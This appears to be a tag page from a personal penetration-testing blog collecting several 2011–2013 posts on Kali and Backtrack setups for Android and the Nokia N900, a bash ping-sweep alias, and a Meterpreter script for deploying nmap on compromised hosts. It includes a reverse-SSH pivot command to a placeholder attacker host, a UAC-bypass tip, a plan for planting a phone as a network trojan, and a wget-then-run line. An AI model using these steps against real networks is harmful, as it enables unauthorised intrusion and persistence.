Tag: nmap

Steps Toward Weaponizing the Android Platform

by on May.11, 2013, under Posts

(4/16/2015) – NOTE: THIS SOLUTION HAS BEEN KIND OF SUPERSEDED BY https://www.kali.org/kali-linux-nethunter/ , if nethunter doesn’t work for you then continue on with this post:

The mobile and tablet market have been flooded by millions upon millions of Android based devices. I wonder if Ken Thompson or Dennis Ritchie would have ever imagined that their invention from nearly 44 years ago would have influenced the likes of the Linux kernel,  Google, Apple, and beyond. We are now in a sea of Unix-like devices that now can easily fit in individuals pockets, which have multiple core processing power and can easily access SCADA systems with a few keystrokes.  It has never been a better time for pocket sized penetration testing devices.

In this article I will be covering ways that one can turn their Android based device into a powerful pocket sized penetration testing tool. If you’re looking to do wireless sniffing or packet injection with your Android based device, this article will be of little help. (If interested please see this, this, this, this, and this.) To do so, one needs a specific Android device that supports OTG, with a custom ROM, and you’ll most likely need an external USB wireless adapter. (Honestly, if you’re looking for a device for cracking WEP keys without any external USB wireless adapters, then I highly still recommend the Nokia N900.)

(NOTE: If you’re strictly looking to do wireless sniffing,  there is AndroidPCAP which I have tested with my Nexus 7 and a RTL8187 based wireless USB adapter.)

Firstly, before progressing on towards the weaponizing of your Android device, please take the time to back up any vital information. Have a look at this.  Reason being, is that you’ll need to root your Android based device. Depending on your device and the method of rooting, rooting your device and unlocking the bootloader can wipe your device.

Setting up Kali Linux ARM Chroot on your rooted Android based device that has about 6GB of free space

1.) Install BusyBox
2.) Install Terminal Emulator
3.) I created a Kali Linux ARM IMG that one can easily mount and it can be downloaded here:
http://goo.gl/qmGle
https://archive.org/details/Kali.nogui.armel.zitstif.chroot.482013

kali.nogui.armel.zitstif.chroot.482013.7z

md5: d60c5a52bcea35834daecb860bd8a5c7
sha1: f62c2633d214de9edad1842c9209f443bcea385d

kali.img

MD5: be61799f8eb2d98ff8874daaf572a1d5
SHA-1: f9c6a820349530350bbb902d17ae6b4a5173937c

NOTE: This image gives you about 2GB of free space in the environment to play with so use with care.

4.) Extract the 7z file and make sure that there’s a folder in this following location: /sdcard/kali
5.) In this folder you should have shell script named ‘kali’ and the ‘kali.img’ image file.
6.) To mount the kali.img file as root do this: sh /sdcard/kali/kali

Optional:
If you want Terminal Emulator to open up and go directly to the chroot environment do as follows:
1.) Open up Terminal Emulator
2.) Go to preferences
3.) Tap on Initial Command
4.) Enter this: su -c “cd /sdcard/kali && sh kali”

Now if you tap on Terminal Emulator, you’ll go directly to your Kali chroot environment. If you want to leave the environment and back to the Android command line, simply type exit.

Optional: If you want to access files from /sdcard/ from your Kali chroot envrionment, one way is to have an Openssh server on your Android device that listens on all interfaces. Then under your chroot envrionment do: mkdir /media/sdcard/ and then connect to your ssh server on your loopback interface to store the ssh key. Then you could use a script like this in your chroot environment (or even edit your .bashrc file to run it automatically):

http://zitstif.no-ip.org/mountsdcard.py #You’ll need to edit the username and password appropriately for your situation.

I should warn you that this Kali image is not setup with the idea of using a window manager or really any GUI tools. In my humble opinion to take advantage of Kali Linux, you don’t need a GUI. Using the terminal to access tools like nmap, netcat, w3af_console, sqlmap, xsser, and metasploit will be sufficient to get one started on their penetration test.

Once you’re in the Kali Linux chroot environment, please do the following:

apt-get update && apt-get upgrade && msfupdate

In addition to setting up the Kali Linux chroot environment, here are a list of other tools and a quick description of each that I recommend you to install:

2X Client – Remote desktop client
AndFTP – ftp/sftp client
androidVNC – vnc viewer client
AndSMB – Android Samba client
AnyTAG NFC Launcher – Automate your phone by scanning NFC tags
APG – OpenGPG for Android
CardTest –  Test your NFC enabled credit cards
Checksum –  basically a GUI tool for md5sum and shasum tools
ConnectBot – powerful ssh client
DNS Lookup – perform DNS and WHOIS lookups
Dolphin Browser – a browser that easily allows you to change your UserAgent
DroidSQLi – automated MySQL injection tool
dSploit – Android Network Penetration Suite
Electronic Pickpocket –  wirelessly read NFC enabled cards
Exif Viewer – shows exif data from photos and can remove this information
Fast notepad – simple but useful notepad application
Find My Router’s Password – title explains it all (mostly for default passwords)
Fing – very similar to Look@LAN tool for Windows
Goomanager –  see link for more information
Hacker’s Keyboard –  Miss the easily accessible CTRL key? This app is for you
HashPass – translate text into hashes
Hex Editor –  a very usable hex editor for Android
inSSIDer – wireless network scanner
intercepter-NG – multi-function network tool, sniffer, cookie intercepter, arp poisoner
IP info Detective – find out all sorts of info on an IP address
IP Webcam – turn your Android device into an IP security camera
Network Signal Info – basically a graphical tool for iwconfig
NFC Reader – used for reading various NFC technologies including some keycards
NFC ReTAG – Re-use/recycle write protected NFC Tags such as hotel key-cards, access badges, etc
NFC TagInfo -another NFC reader
OpenVPN Connect – open vpn client
Orbot – tor on Android
Packet Injection – poorman’s GUI version of scapy
ProxyDroid – use your socks5 proxy with this application
Root Browser – great file manager for Android
Routerpwn – test how secure your router is
SandroProxy – kind of like Webscarab
Secret Letter – a  poorman’s stegonagraphy tool
SSHDroid – openssh server for android
Supersu – manage what programs access root functions
Teamviewer – remotely control Windows, OSX, and Linux based systems
Terminal Emulator – no explanation needed
tPacketCapture – packet sniffer that doesn’t require root
VirusTotal Uploader – test your malicious payloads
Voodoo OTA RootKeeper – maintain root access even after updates
Wifi File Transfer – access files on your phone from a web browser via an http server
WifiFinder – simple wireless scanner
WiGLE Wifi wardriving – wardriving/warwalking application

Of course this is probably not complete, but I believe this is a very good suite of tools to get one started. If you can think of any more tools or if you have any suggestions, please feel free to leave a comment below.

24 Comments :, , , , , , , , , , , , , , , , , , , , , , , , , more...

Kolmogorov Complexity, Natural Language Programming and the Bash shell

by on Jan.14, 2012, under Code, Posts

The following post superficially applies the concepts of Kolmogorov complexity of an object and natural language programming using the bash shell. Part of the inspiration for this post came from this video: http://www.youtube.com/watch?v=KyB13PD-UME

In this post we will be treating strings as objects in a similar sense of Kolmogorov complexity. Then we will apply an alias name or function name to the object which then the alias/function name can be perceived as a natural language sentence.

Take the following object:

sudo nmap -sP -n -T4 $(netstat -rn | awk ‘{print $2}’ | egrep ‘[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}’ | fgrep -v “0.0.0.0” | sed -e ‘s/\([0-9]\)\{1,3\}$/1-254/g’)

To individuals who are not familiar with the bash shell or bash shell programming, this object does not make a whole lot of sense. What does it do? What does it mean? Why is this one-liner algorithm useful to some individuals?

For those of who you aren’t sure, this one-liner algorithm is used for ping sweeping your local subnet based upon the gateway’s IP address. So if your gateway is 192.168.1.1 then when the bash shell expands and processes the sub-shell variable $(netstat -rn | awk ‘{print $2}’ | egrep ‘[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}’ | fgrep -v “0.0.0.0” | sed -e ‘s/\([0-9]\)\{1,3\}$/1-254/g’‘), it would result with 192.168.1.1-254. Lastly, the string would result with sudo nmap -sP -n -T4 192.168.1.1-254.

To take the time to type out this 196 character object each time you connect to a network that you’re exploring, would be extremely tedious and time consuming. Ergo to save an individual some time and keystrokes, this is where we will apply the ‘alias’ function that is built into the bash shell:

alias PingSweepLocalSubnet=”sudo nmap -sP -n -T4 $(netstat -rn | awk ‘{print $2}’ | egrep ‘[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}’ | fgrep -v “0.0.0.0” | sed -e ‘s/\([0-9]\)\{1,3\}$/1-254/g’)”

Here the 20 character alias PingSweepLocalSubnet saves the end user 176 characters to type and makes more sense depending on if the user is familiar with networking terminologies. Granted this may not be, “the shortest description of this object” and the proper simplifying algorithm according to Kolmogorov complexity method, but this is where the idea of natural language programming is applied. With this object, if we use the Kolmogorov complexity concept, is nearly incompressible. I wanted this alias to be time saving and to be almost a form of natural language programming.

We must also remember that we do not necessarily need to use the ‘alias’ function from the bash shell. We can also achieve the same result by using ‘function’ from bash shell:

function PingSweepLocalSubnet()
{
sudo nmap -sP -n -T4 $(netstat -rn | awk ‘{print $2}’ | egrep ‘[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}’ | fgrep -v “0.0.0.0” | sed -e ‘s/\([0-9]\)\{1,3\}$/1-254/g’
);
}

In turn end users may want to use function assignments rather than aliases. Aliases are limited and are simply string substitutions. For further reading on using aliases or functions take a look at: http://linuxgazette.net/issue53/eyler.html Whether or not the end user decides to use ‘alias’ or ‘function’ is subjective to the user.

Leave a Comment :, , , , , , , , , , , , , , , , , , , , , , more...

A Note on Updating Weaponized Nokia N900s

by on Dec.17, 2011, under Code, Posts

I wanted to make this post to save time and headaches for people who own ‘weaponized’ Nokia N900s.

If you regularly update your Nokia N900 by doing (as root):

apt-get update && apt-get upgrade -y

I have ran into some issues with some of the newer packages.

Firstly, the newest beta version of nmap (5.59BETA1_armel) appears to be buggy enough to the point where it’s almost unusable.

Running this:
nmap -sS -P0 -vv www.google.com -p 80

Yields:
Starting Nmap 5.59BETA1 (http://nmap.org) at 2011-12-17 21:14 EST
Warning Hostname www.google.com resolves to 6 IPs. Using 74.125.45.147
route_dst_netlink: can’t find interface “wlan0”

Secondly, subversion (svn) gets completely broken due to a library compatibility issue:

svn -h
Segmentation fault

There has been discussion on this: http://talk.maemo.org/showthread.php?p=970467

Having svn broken really stinks, because then I am not able to update Metasploit. Who in the hell wants to run an outdated version of Metasploit? (I imagine there are some people..)

To work around this for the time being I have crafted the following shell script:

#!/bin/bash

if [ ${#} -lt 1 ]
 then
   echo "Usage:	"
   echo "./update.sh normal #This just does a normal update";
   echo "./update.sh modded #This will do a normal update and then downgrade libaprutil1, libapr1 and nmap so that they work";
   exit 1;
fi

if echo ${1} | egrep "normal"  > /dev/null;
 then
   apt-get update;
   apt-get upgrade -y;
   exit 0;
elif echo ${1} | egrep "modded"  > /dev/null;
 then
   apt-get update;
   apt-get upgrade -y;
   apt-get install nmap=5.50-2 libaprutil1=1.3.9-2 libapr1=1.4.2-1 --force-yes -y;
   apt-get clean && apt-get autoclean;
   exit 0;
else
   echo "I don't know what you are trying to do.." #Thanks Arc
   exit 2;
fi

http://zitstif.no-ip.org/update.txt
SHA1 (update.txt) = d83306d18a146a54a38ea236e3a236b4955bb81b

For the time being if you’re in a similar case like me, you’ll have to use this shell script (wget http://zitstif.no-ip.org/update.sh &&  chmod +x update.sh && ./update.sh modded).

15 Comments :, , , , , , , , , , , , , , more...

Meterpreter script – deploy_nmap.rb

by on Aug.08, 2011, under Code, Meterpreter Scripts, Posts

Using a ‘trusted’ host that you have compromised as leverage during a pentest, is nearly always advantageous. I personally believe that the steps of pentesting change in a sense, once you have a session on a computer in an internal network from an external computer.

I would revert back to reconnaissance (depending on the circumstances), since the point of view has changed. The hijacked host is “your man on the inside”, and what a better way to give the ‘man on the inside’ some ‘eyes’ by deploying and using nmap!

One means of using nmap through the compromised host includes:

1.) Deploying an openssh server on the victim machine

2.) Setting up an account

3.) Reversing an ssh session like so: ssh -R 2222:localhost:22 attacker@attackersbox.com

4.) Then you would connect back to the victim using a socks5 proxy: ssh -D 9050 victimaccount@localhost -p 2222

5.) Lastly, you would use nmap and proxychains from the attacker’s host to scan hosts internally through a tunnel between you and the victim machine.

Keep in mind that the Metasploit framework has an auxiliary module “auxiliary/scanner/portscan”, which you can use but let me be quite frank, it doesn’t compare to what is known as the ‘king of all port scanners’ nmap. (No offense Metasploit crew.)

This is why I programmed a meterpreter script that downloads the latest stable version of nmap from www.insecure.org and then deploys nmap onto the victim’s machine. You could then use the victim’s machine to do vulnerability scanning with nmap’s scripting engine. (i.e. nmap –script=smb-check-vulns).

The script has a removal feature that will uninstall nmap and winpcap from the victim’s machine. Please e-mail me or comment if you have any questions, concerns or problems with the script.

NOTE: On versions of Microsoft Windows that use the UAC service, you will most likely need to disable or circumvent this service to successfully deploy nmap.  Luckily there is a module with the Metasploit framework that will help you (post/windows/escalate/bypassuac).

http://zitstif.no-ip.org/meterpreter/deploy_nmap.txt

Leave a Comment :, , , , , , , , , , , , , , , , , more...

Weaponizing the Nokia N900 – Part 3.8 – Backtrack 5 on N900

by on May.28, 2011, under Posts

First and foremost I am not taking credit for the act of this. There are other posts on getting Bactrack 5 (ARM) onto the N900. My post mostly pertains to my experience with Backtrack 5 on the N900 and how viable of a offensive information security tool it is.

If you’re curious as to how to get Backtrack 5 running on your N900, you want to thank SuperDumb from the Maemo forums, and take a look at this forum thread. Observe that the default Backtrack 5 (arm) image will not copy over to your vfat microSD external or internal cards. vfat has a file size limit

There are some guides that advocate using ext2/3 on flash devices, but I do not condone you doing this, please see:

http://www.linux.com/archive/feature/114295

To circumvent this issue you can download an image that will work on vfat here, or if you would prefer to re-size the image yourself, follow these steps that SuperDumb graciously gave me via a PM:

Must be done under linux :
Just an example, change the dirs how you want them :

First you need to get the bt5.img out of the downloaded file from backtrack :

gunzip bt5.img.gz

These are the steps to get a img that is small enough :

mv bt5.img bt5.old.img

dd if=/dev/zero of=bt5.img bs=4k count=900000
mke2fs -F -i 8192 bt5.img

mkdir bt5old bt5new
mount -o loop bt5.old.img bt5old
mount -o loop bt5.img bt5new
cd bt5old
cp -rp * ../bt5new

After that just umount bt5old & bt5new and you should have a working img.

Once you have a working img, you will need to have qchroot on your N900 along with gainroot. Then to get Backtrack 5 running on your N900 via the non-GUI way, you simply do as follows:

1.) sudo gainroot

2.) mkdir /mnt/bt5

3.)qchroot /location/to/bt5.img /mnt/bt5

One important note I would like to add with regards to the location of the bt5.img file, is that if you’re like me and you have a bootable linux distro on mmc1, you will not want to have the bt5.img on mmc1. Once your computer mounts the mmc1 card, your mmc1 card will not be accessible via your phone.

You can get VNC up and running, however the N900 keyboard and the Backtrack 5 GUI (at least using gnome) do not get along that well. Additionally, it is resource intensive and if you ask me, to truly utilize Backtrack or almost any Linux distribution, you want to use the command line interface. This is where the power lies. There are a few exceptions to this rule but exceptions don’t necessarily make the rule.

In my humble opinion having Backtrack 5 running on your N900 is not really worth it. My reasoning is due to my experience with it. Here are a couple instances of annoyances that I ran into:

– It is unstable. There were a few times that I would make an attempt to edit sources.list, via:  ‘vi /etc/apt/sources.list’ and my phone would randomly reboot.

– The GUI does not work well at all.

– There are packages that are easily available under the N900, that aren’t easily available under Backtrack 5 (ARM). (kismet for example.)

– Some packages are just broken. For example, miredo does not work at all. (More on miredo later…)

– Nmap’s version under BT5 arm is 5.00 and you can get Nmap for maemo on the N900 at version 5.50.

– easydebian seems like a better alternative and is more stable.

I’m going to go on a bit of a tangent here that I hope is informal and useful.

With miredo not working under BT5 on the N900, that was kind of a big annoyance to myself because miredo for the Maemo even appears to be broken as well.  To get miredo working on your N900 you will want to install and use easydebian.

What is beautiful with miredo, is that you can get an IPv6 address assigned to your N900. You could then use your N900 as a hardware based trojan in a network. The whole concept is very similar to what Mubix did here. You could setup your N900 on a victim network and have ssh listing on your public IPv6 address and then log in to your N900 from an outside network over IPv6. You wouldn’t even have to do any port forwarding on the victim’s firewall/gateway/router.

I will tell you that miredo does not work on all networks and does not appear to work over the gprs0 interface on the N900 (at least with my carrier). Though it works just fine on the wlan0 interface.

Readjusting back from that tangent, summarily I would like to state that the fact that you can get Backtrack 5 working on your N900 is wonderful. Consequently, due to my experience with running BT5 on the N900, I would just advise to use easydebian over BT5 and then customize easydebian to the point that it is essentially a ‘Backtrack’ version. It will be a more stable route to go and you can learn about the tools as you install them, versus having a plethora of tools at your disposal that you may not get around to learning.

14 Comments :, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , more...

Looking for something?

Use the form below to search the site:

Still not finding what you're looking for? Drop a comment on a post or contact us so we can take care of it!